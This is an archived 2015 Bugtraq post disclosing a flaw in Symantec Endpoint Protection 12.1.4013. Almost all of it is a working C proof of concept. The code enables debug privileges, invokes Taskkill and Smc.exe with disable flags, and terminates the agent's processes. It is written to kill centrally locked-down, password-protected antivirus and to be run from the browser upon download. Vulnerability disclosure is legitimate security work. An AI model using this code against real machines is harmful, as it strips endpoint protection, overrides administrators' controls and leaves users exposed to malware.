lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201507080249.t682nXPA015112@sf01web2.securityfocus.com>
Date: Wed, 8 Jul 2015 02:49:33 GMT
From: apparitionsec@...il.com
To: bugtraq@...urityfocus.com
Subject: Symantec EP 12.1.4013 Disabling Vulnerability

#include <windows.h>
#include <Tlhelp32.h>
#define SMC_EXE "Smc.exe"
#define SMC_GUI "SmcGui.exe"
#define CC_SVC_HST "ccSvcHst.exe"

/*
By John Page (hyp3rlinx) - Dec 2014 - hyp3rlinx.altervista.org
Symantec Endpoint Protection version 12.1.4013
First reported to Symantec - Jan 20, 2015

Goal:
Kill Symantec EP agent & services after globally locking down endpoint protection via the
Symantec central management server and enabling globally managed password protection controls. Tested successfully on Windows 7 SP1 result may vary OS to OS.

Scenario:
Run the from browser upon download or save to some directory and run
Not the most elegant code and I don't care...

*/

void el_crookedio_crosso(const char *victimo){     
    HANDLE hSnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
    PROCESSENTRY32 pEntry;
    pEntry.dwSize=sizeof(pEntry);
    BOOL hRes=Process32First(hSnapShot,&pEntry);
    
    while(hRes){
        if(strcmp(pEntry.szExeFile,victimo)==0){
            HANDLE hProcess=OpenProcess(PROCESS_TERMINATE,0,(DWORD)pEntry.th32ProcessID);
            if (hProcess!=NULL){
                TerminateProcess(hProcess,9);
                CloseHandle(hProcess);
            }
        }
        hRes=Process32Next(hSnapShot,&pEntry);
    }
    CloseHandle(hSnapShot);
}

DWORD exeo_de_pid(char *ghostofsin){
    DWORD ret=0;
    PROCESSENTRY32 pe32={sizeof (PROCESSENTRY32)};
    HANDLE hProcSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    if (hProcSnap==INVALID_HANDLE_VALUE) return 0;
    if (Process32First (hProcSnap,&pe32))
        do
            if (!strcmp(pe32.szExeFile,ghostofsin)) {
                ret=pe32.th32ProcessID;
                break;
            }
        while (Process32Next (hProcSnap,&pe32));
    CloseHandle (hProcSnap);
    return ret;
}

void angelo_maliciouso(){
   int AV=exeo_de_pid(SMC_EXE);
   char id[8];
   sprintf(id, "%d ", AV);
   printf("%s", id);
   char cmd[50]="Taskkill /F /PID ";
   strcat(cmd, id);
   system(cmd);
   
  // system("Taskkill /F /IM Smc.exe");  //Access denied.
  system("\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\Smc.exe\" -disable -ntp");

  Sleep(1000);
  
    el_crookedio_crosso(SMC_EXE);
    el_crookedio_crosso(SMC_GUI);
    el_crookedio_crosso(CC_SVC_HST);
    
}

int main(void){
    
    puts("/*-----------------------------------------------------------*/\n");
    puts("|     EXORCIST DE SYMANTEC Antivirus version 12.1.4013        |\n");
    puts("|                  By hyp3rlinx - Jan 2015                    |\n");
    puts("/*------------------------------------------------------------*/\n");
    
   SetDebugPrivileges();
   angelo_maliciouso(); 

   Sleep(1000);
  
   el_crookedio_crosso(SMC_EXE);
   el_crookedio_crosso(SMC_GUI);
   el_crookedio_crosso(CC_SVC_HST);
    
   Sleep(2000);
   angelo_maliciouso();
    
   Sleep(6000);
       
   return 0;
}

int SetDebugPrivileges(){ 
	DWORD err=0; 
	TOKEN_PRIVILEGES Debug_Privileges; 
	if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&Debug_Privileges.Privileges[0].Luid))return GetLastError(); 
	HANDLE hToken=0; 
	if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)){ 
		err=GetLastError();   
		if(hToken)CloseHandle(hToken); 
		return err; 
	} 
	Debug_Privileges.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; 
	Debug_Privileges.PrivilegeCount=1; 

	if(!AdjustTokenPrivileges(hToken,FALSE,&Debug_Privileges,0,NULL,NULL)){ 
		err=GetLastError(); 
		if(hToken) CloseHandle(hToken); 
	} 
	return err; 
}

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ